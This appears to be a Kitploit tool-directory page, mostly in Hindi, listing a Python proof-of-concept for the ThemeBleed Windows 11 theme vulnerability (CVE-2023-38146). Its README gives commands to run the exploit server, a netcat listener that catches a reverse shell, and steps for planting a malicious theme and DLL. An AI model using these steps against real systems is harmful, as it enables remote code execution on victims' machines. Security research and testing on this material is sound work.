Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-38146 — ThemeBleed Windows 11 CVE-2023-38146 के लिए python में impacket का उपयोग करके लिखा गया PoC। https://jnns.de/posts/cve-2023-38146-poc/ | Kitploit
उपकरण/GitHubGitHub/jnnshschl/cve-2023-38146
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubjnnshschl/cve-2023-38146

CVE-2023-38146

ThemeBleed Windows 11 CVE-2023-38146 के लिए python में impacket का उपयोग करके लिखा गया PoC। https://jnns.de/posts/cve-2023-38146-poc/

रिपॉजिटरी देखें
27452 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ThemeBleed CVE-2023-38146 एक्सप्लॉइट के लिए PoC (Windows 11 थीम्स)

https://github.com/gabe-k/themebleed से अत्यधिक प्रेरित, जो केवल Windows पर चलता है (यही कारण है कि मैंने इसे लिखने का निर्णय लिया)।

संशोधित कोड का उपयोग impacket smbserver.py (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py) से किया गया है।

उपयोगी सामग्री: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs

ब्लॉग पोस्ट: https://jnns.de/posts/cve-2023-38146-poc/

इसका उपयोग कैसे करें:

आवश्यकताएँ इंस्टॉल करें और एप्लिकेशन चलाएँ:

pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711

# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711

कमजोर मशीन पर "evil_theme.theme" या "evil_theme.themepack" का उपयोग करें।

सफलता!

कस्टम DLL फ़ाइल:

एक DLL जिसमें "VerifyThemeVersion" नामक एक्सपोर्टेड फ़ंक्शन हो, उसे "./td/" फ़ोल्डर में "Aero.msstyles_vrf_evil.dll" नाम से रखें। आप Google का उपयोग करके एक उदाहरण DLL पा सकते हैं या मेरे उदाहरण का उपयोग कर सकते हैं: https://github.com/Jnnshschl/ThemeBleedReverseShellDLL।

pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll

# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711
टूल डाउनलोड करें